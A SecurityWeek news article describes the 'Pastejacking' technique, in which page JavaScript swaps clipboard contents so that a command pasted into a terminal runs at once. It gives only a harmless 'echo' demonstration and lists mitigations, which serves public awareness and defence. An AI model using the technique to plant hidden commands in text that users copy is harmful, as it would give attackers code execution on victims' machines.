Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Application Security

Pastejacking Attack Allows Hackers to Execute Malicious Code

The fact that web browsers allow developers to manipulate the content of the clipboard can be exploited by attackers to trick unsuspecting users into executing potentially malicious code on their systems.

The fact that web browsers allow developers to manipulate the content of the clipboard can be exploited by attackers to trick unsuspecting users into executing potentially malicious code on their systems.

Experts demonstrated several years ago that HTML/CSS tricks could be used to add arbitrary content to the clipboard without the user’s knowledge. However, the method detailed by developer and security expert Dylan Ayrey, dubbed “Pastejacking,” relies on JavaScript to accomplish the task.

“What’s different about this is the text can be copied after an event, it can be copied on a short timer following an event, and it’s easier to copy in hex characters into the clipboard, which can be used to exploit VIM,” Ayrey explained.

A proof-of-concept (PoC) developed by the expert shows the threat posed by a Pastejacking attack when the user pastes commands copied from the web browser into the terminal. The example provided by Ayrey shows how an attacker can trick the user into thinking that they are copying echo “not evil” when in fact the string that gets copied is echo “evil”\n.

The \n (newline) character ensures that the command is executed automatically when pasted into the terminal without the user having to press the enter/return key. This means that the victim doesn’t get to see what they are pasting before it gets executed.

It’s worth noting that Ayrey’s PoC only works if the code is copied using keyboard shortcuts. However, the advantage is that the malicious content is added to the clipboard regardless of what piece of text is copied from the PoC page.

Malicious actors can use even more sophisticated payloads where a sequence of commands is executed. For instance, the expert demonstrated that the attacker can create a file in the home directory, clear the terminal, and display the command the user intended to copy in an effort to avoid raising suspicion. Sophisticated payloads can also be used if the attacker serves malicious code designed for execution in the vim text editor.

“This method can be combined with a phishing attack to entice users into running seemingly innocent commands. The malicious code will override the innocent code, and the attacker can gain remote code execution on the user’s host if the user pastes the contents into the terminal,” Ayrey said.

Advertisement. Scroll to continue reading.

The attack method does not work against Apple’s Safari browser, and some applications, such as the OS X terminal replacement iTerm and the Windows console emulator Cmder, show warnings when a command containing the newline character is about to be pasted.

While many believe they would never fall for such tricks, some pointed out that it’s not uncommon for users to copy and paste commands from websites such as StackOverflow.

Pastejacking attacks can be mitigated by disabling JavaScript or by making various settings changes in the affected applications. However, the easiest way to avoid falling victim to such attacks is to be cautious when pasting content from questionable sources.

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

The AI Risk Summit brings together security and risk management executives, AI researchers, policy makers, software developers and influential business and government stakeholders.

Register

People on the Move

Satellite cybersecurity company SpiderOak has named Kip Gering as its new Chief Revenue Officer.

Merlin Ventures has appointed cybersecurity executive Andrew Smeaton as the firm’s CISO-in-Residence.

Retired U.S. Army General and former NSA Director Paul M. Nakasone has joined the Board of Directors at OpenAI.

More People On The Move

Expert Insights